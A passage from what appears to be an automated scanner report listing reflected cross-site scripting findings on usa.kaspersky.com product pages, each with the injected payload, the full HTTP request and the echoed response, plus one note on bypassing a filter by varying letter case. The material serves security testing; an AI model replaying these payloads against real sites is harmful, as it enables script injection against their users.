<link rel="canonical" href="http://usa.kaspersky.com/products-services2e531"><script>alert(1)</script>2e971b4bb0c/business/kaspersky-open-space-security" />
...[SNIP]...

1.260. http://usa.kaspersky.com/products-services/business/kaspersky-open-space-security [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business/kaspersky-open-space-security

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8f8a"-alert(1)-"b2db9442c2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services/businessb8f8a"-alert(1)-"b2db9442c2c/kaspersky-open-space-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:04:20 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688260"
Content-Type: text/html; charset=utf-8
Content-Length: 39817
Date: Sat, 18 Dec 2010 16:04:27 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/businessb8f8a"-alert(1)-"b2db9442c2c/kaspersky-open-space-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.261. http://usa.kaspersky.com/products-services/business/kaspersky-open-space-security [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business/kaspersky-open-space-security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d519f"><script>alert(1)</script>80a4f99ffcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/businessd519f"><script>alert(1)</script>80a4f99ffcd/kaspersky-open-space-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:03:50 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688230"
Content-Type: text/html; charset=utf-8
Content-Length: 34572
Date: Sat, 18 Dec 2010 16:04:04 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/businessd519f"><script>alert(1)</script>80a4f99ffcd/kaspersky-open-space-security" />
...[SNIP]...

1.262. http://usa.kaspersky.com/products-services/business/kaspersky-open-space-security [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business/kaspersky-open-space-security

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b2f2"><script>alert(1)</script>8e291b72410 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/business/kaspersky-open-space-security1b2f2"><script>alert(1)</script>8e291b72410 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:06:12 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688372"
Content-Type: text/html; charset=utf-8
Content-Length: 32625
Date: Sat, 18 Dec 2010 16:06:27 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/business/kaspersky-open-space-security1b2f2"><script>alert(1)</script>8e291b72410" />
...[SNIP]...

1.263. http://usa.kaspersky.com/products-services/business/kaspersky-open-space-security [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business/kaspersky-open-space-security

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b1af"-alert(1)-"a51dadfa536 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services/business/kaspersky-open-space-security1b1af"-alert(1)-"a51dadfa536 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:06:58 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688418"
Content-Type: text/html; charset=utf-8
Content-Length: 39288
Date: Sat, 18 Dec 2010 16:07:25 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
rop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/business/kaspersky-open-space-security1b1af"-alert(1)-"a51dadfa536";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.264. http://usa.kaspersky.com/products-services/business/kaspersky-open-space-security [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business/kaspersky-open-space-security

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec86d"><script>alert(1)</script>625177f2ca9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/business/kaspersky-open-space-security?ec86d"><script>alert(1)</script>625177f2ca9=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:58:30 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292687910"
Content-Type: text/html; charset=utf-8
Content-Length: 46188
Date: Sat, 18 Dec 2010 15:58:43 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/business/kaspersky-open-space-security?ec86d"><script>alert(1)</script>625177f2ca9=1" />
...[SNIP]...

1.265. http://usa.kaspersky.com/products-services/business/kaspersky-security-applications [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business/kaspersky-security-applications

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5971a"><script>alert(1)</script>b6fd729e2e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services5971a"><script>alert(1)</script>b6fd729e2e1/business/kaspersky-security-applications HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:03:21 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688201"
Content-Type: text/html; charset=utf-8
Content-Length: 31803
Date: Sat, 18 Dec 2010 16:03:27 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services5971a"><script>alert(1)</script>b6fd729e2e1/business/kaspersky-security-applications" />
...[SNIP]...

1.266. http://usa.kaspersky.com/products-services/business/kaspersky-security-applications [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business/kaspersky-security-applications

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0b74"-alert(1)-"389afd82830 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-servicesf0b74"-alert(1)-"389afd82830/business/kaspersky-security-applications HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:03:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688220"
Content-Type: text/html; charset=utf-8
Content-Length: 39486
Date: Sat, 18 Dec 2010 16:03:49 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-servicesf0b74"-alert(1)-"389afd82830/business/kaspersky-security-applications";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.267. http://usa.kaspersky.com/products-services/business/kaspersky-security-applications [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business/kaspersky-security-applications

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdf57"><script>alert(1)</script>fe72da739c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/businessbdf57"><script>alert(1)</script>fe72da739c4/kaspersky-security-applications HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:05:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688340"
Content-Type: text/html; charset=utf-8
Content-Length: 31802
Date: Sat, 18 Dec 2010 16:05:44 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/businessbdf57"><script>alert(1)</script>fe72da739c4/kaspersky-security-applications" />
...[SNIP]...

1.268. http://usa.kaspersky.com/products-services/business/kaspersky-security-applications [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business/kaspersky-security-applications

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33efa"-alert(1)-"a7bc848afcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services/business33efa"-alert(1)-"a7bc848afcd/kaspersky-security-applications HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:06:02 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688362"
Content-Type: text/html; charset=utf-8
Content-Length: 40049
Date: Sat, 18 Dec 2010 16:06:08 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/business33efa"-alert(1)-"a7bc848afcd/kaspersky-security-applications";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.269. http://usa.kaspersky.com/products-services/business/kaspersky-security-applications [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business/kaspersky-security-applications

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe817"><script>alert(1)</script>9a36abaecee was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/business/kaspersky-security-applicationsfe817"><script>alert(1)</script>9a36abaecee HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:08:29 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688509"
Content-Type: text/html; charset=utf-8
Content-Length: 31812
Date: Sat, 18 Dec 2010 16:09:03 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/business/kaspersky-security-applicationsfe817"><script>alert(1)</script>9a36abaecee" />
...[SNIP]...

1.270. http://usa.kaspersky.com/products-services/business/kaspersky-security-applications [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business/kaspersky-security-applications

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b7e2"-alert(1)-"e637618675a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services/business/kaspersky-security-applications5b7e2"-alert(1)-"e637618675a HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:09:37 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688577"
Content-Type: text/html; charset=utf-8
Content-Length: 40499
Date: Sat, 18 Dec 2010 16:09:52 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
p4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/business/kaspersky-security-applications5b7e2"-alert(1)-"e637618675a";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.271. http://usa.kaspersky.com/products-services/business/kaspersky-security-applications [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/business/kaspersky-security-applications

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65ac3"><script>alert(1)</script>781bfe3bbd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/business/kaspersky-security-applications?65ac3"><script>alert(1)</script>781bfe3bbd0=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:00:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688046"
Content-Type: text/html; charset=utf-8
Content-Length: 52705
Date: Sat, 18 Dec 2010 16:01:03 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/business/kaspersky-security-applications?65ac3"><script>alert(1)</script>781bfe3bbd0=1" />
...[SNIP]...

1.272. http://usa.kaspersky.com/products-services/home-computer-security [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f262"><ScRiPt>alert(1)</ScRiPt>d521c293ae7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /products-services5f262"><ScRiPt>alert(1)</ScRiPt>d521c293ae7/home-computer-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:04:33 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688273"
Content-Type: text/html; charset=utf-8
Content-Length: 30289
Date: Sat, 18 Dec 2010 16:04:42 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services5f262"><ScRiPt>alert(1)</ScRiPt>d521c293ae7/home-computer-security" />
...[SNIP]...

1.273. http://usa.kaspersky.com/products-services/home-computer-security [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security

Issue detail

